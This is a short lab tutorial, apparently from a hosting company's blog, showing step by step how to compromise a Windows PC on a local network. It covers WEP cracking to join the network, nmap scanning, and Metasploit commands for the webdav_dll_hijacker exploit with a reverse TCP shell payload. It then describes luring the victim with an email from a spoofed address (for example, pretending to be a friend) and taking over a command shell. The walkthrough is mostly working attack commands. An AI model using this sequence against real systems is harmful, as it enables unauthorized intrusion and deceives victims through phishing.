DD-HOST LAB

Let"s start.

BackTrack5 r3 should be installed on attacker"s PC.
(see http://www.ddhost.jp/lab/2013/05/backtrack5.html to install BackTrack5r3.)

At first, the attacker"s PC must connect to a network segment with the target PC.
See http://www.ddhost.jp/lab/2013/05/lanwep.html to connect via Wi-Fi with WEP cracking.
Now, the attacker can communicate with target PC.

The attacker can see network-address of the network segment.
Type "ifconfig". The network address is "192.168.11.0/24" in the sample below.
The attacker"s PC got "192.168.11.3" from a DHCP server.

Then, type "nmap -n -sP 192.168.11.0/24".
All network terminals available.
In the sample below...
- 192.168.11.1 - Buffalo (Broadband Router)
- 192.168.11.2 - PC (target)
- 192.168.11.3 - PC (attacker)

Type "nmap 192.168.11.2" to get more information from the target PC.
Maybe it"s a Windows terminal because TCP-port 445 is connectable.

Run "msfconsole" to use Metasploit Framework.

Type
- "use exploit/windows/browser/webdav_dll_hijacker"
- "set EXTENSIONS html"
- "set BASENAME readme"
- "set PAYLOAD windows/shell/reverse_tcp"
- "set LHOST 192.168.11.3" (Change to the attacker"s IP address.)

Run "exploit" to start the exploit.

The target PC must access to "\\192.168.11.3\documents\" via WebDAV.
The attacker send the path with using an e-mail from a fake address (ex. the target"s friends)
See http://www.ddhost.jp/lab/2013/05/from_header.html to send an e-mail from a fake address.

Then, an owner of the target PC read the e-mail and access to the path.
The owner finds "readme.html" and opens it with using Firefox 3.6.8.

A few minutes later, a message "Command shell session 1 opened" appears on the console.

Type "sessions -i 1 " to get command-prompt on the target PC.

Now, the attacker can run commands on the target PC.

For example, the attacker can run "calc.exe" on the target PC.